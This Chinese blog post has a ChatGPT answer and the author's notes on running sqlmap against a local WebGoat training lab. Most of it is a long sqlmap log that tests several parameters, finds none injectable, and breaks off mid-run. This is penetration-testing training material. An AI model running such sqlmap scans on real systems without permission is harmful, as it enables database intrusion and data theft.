[研究]sqlmap 1.9.2 對 WebGoat 2025.3 滲透測試
2025-05-12
請以 WebGoat 為目標用 sqlmap 說明入侵滲透測試成功具體步驟 ?
ChatGPT 說:
以下是以 WebGoat 作為目標,使用 sqlmap 進行 SQL Injection 滲透測試成功的 具體步驟說明。這裡以 WebGoat 8.x(Java版)為例,針對 SQL Injection 教學模組中的範例目標。
✅ 前提條件
已安裝 WebGoat 並啟動服務
預設網址:http://localhost:8080/WebGoat
筆者註,實際:http://192.168.128.145:8080/WebGoat
或
http://192.168.128.145:8080/WebGoat/login
按下 or register yourself as a ne user 可以建立帳號
已安裝 sqlmap 工具
安裝方式(Kali Linux 預設有):sudo apt install sqlmap
Windows/macOS 也可從官網 https://sqlmap.org 下載使用。
目標測試 URL:
WebGoat 的 SQL Injection 模組通常提供一個 URL,例如:
http://localhost:8080/WebGoat/SqlInjection/attack2?user_id=1
筆者註,實際:http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjection.lesson
得到 JSESSIONID=F3FA864D5426EF90B70752EE642E65C4
🧪 滲透測試步驟(成功取得資料)
Step 1:打開 WebGoat 的 SQL Injection 模組
進入 WebGoat:http://localhost:8080/WebGoat
登入
開啟「Injection Flaws」→「SQL Injection (advanced)」
http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson
尋找網址中含有 ?user_id= 或類似參數的 GET 或 POST 請求
Step 2:使用 sqlmap 對該 URL 進行測試
在終端機下輸入以下命令:
sqlmap -u "http://localhost:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs
根據實際修改調整後
sqlmap -u "http://192.168.128.145:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.128.145:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.9.2#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:34:14 /2025-05-12/
[02:34:14] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.128.145:8080/WebGoat/login'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=7D845A670DB...603487AD91'). Do you want to use those [Y/n] Y
[02:34:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:34:14] [INFO] testing if the target URL content is stable
[02:34:15] [WARNING] GET parameter 'user_id' does not appear to be dynamic
[02:34:15] [WARNING] heuristic (basic) test shows that GET parameter 'user_id' might not be injectable
[02:34:15] [INFO] testing for SQL injection on GET parameter 'user_id'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:16] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:16] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:16] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:16] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:16] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:17] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:17] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:17] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:17] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:19] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:20] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:20] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:20] [INFO] testing 'Generic inline queries'
[02:34:20] [INFO] testing 'MySQL inline queries'
[02:34:20] [INFO] testing 'PostgreSQL inline queries'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:20] [INFO] testing 'Oracle inline queries'
[02:34:20] [INFO] testing 'SQLite inline queries'
[02:34:20] [INFO] testing 'Firebird inline queries'
[02:34:20] [INFO] testing 'ClickHouse inline queries'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:21] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:34:21] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:22] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:22] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:23] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:23] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:23] [INFO] testing 'Oracle AND time-based blind'
[02:34:23] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:34:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:25] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:26] [WARNING] GET parameter 'user_id' does not seem to be injectable
[02:34:26] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[02:34:26] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[02:34:26] [INFO] testing for SQL injection on parameter 'User-Agent'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:26] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:26] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:26] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:27] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:27] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:27] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:27] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:29] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:29] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:30] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:30] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:30] [INFO] testing 'Generic inline queries'
[02:34:30] [INFO] testing 'MySQL inline queries'
[02:34:30] [INFO] testing 'PostgreSQL inline queries'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:30] [INFO] testing 'Oracle inline queries'
[02:34:30] [INFO] testing 'SQLite inline queries'
[02:34:30] [INFO] testing 'Firebird inline queries'
[02:34:30] [INFO] testing 'ClickHouse inline queries'
[02:34:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:31] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:31] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:31] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:31] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:34:31] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:34:31] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:32] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:32] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:32] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:33] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:33] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:33] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:33] [INFO] testing 'Oracle AND time-based blind'
[02:34:33] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:34] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:34] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:34] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:34] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:34] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:34] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:35] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:36] [WARNING] parameter 'User-Agent' does not seem to be injectable
[02:34:36] [WARNING] parameter 'Referer' does not appear to be dynamic
[02:34:36] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[02:34:36] [INFO] testing for SQL injection on parameter 'Referer'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:36] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:36] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:37] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:37] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:37] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:38] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:39] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:39] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:40] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:40] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:40] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:40] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:40] [INFO] testing 'Generic inline queries'
[02:34:40] [INFO] testing 'MySQL inline queries'
[02:34:40] [INFO] testing 'PostgreSQL inline queries'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:40] [INFO] testing 'Oracle inline queries'
[02:34:40] [INFO] testing 'SQLite inline queries'
[02:34:40] [INFO] testing 'Firebird inline queries'
[02:34:40] [INFO] testing 'ClickHouse inline queries'
[02:34:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:41] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
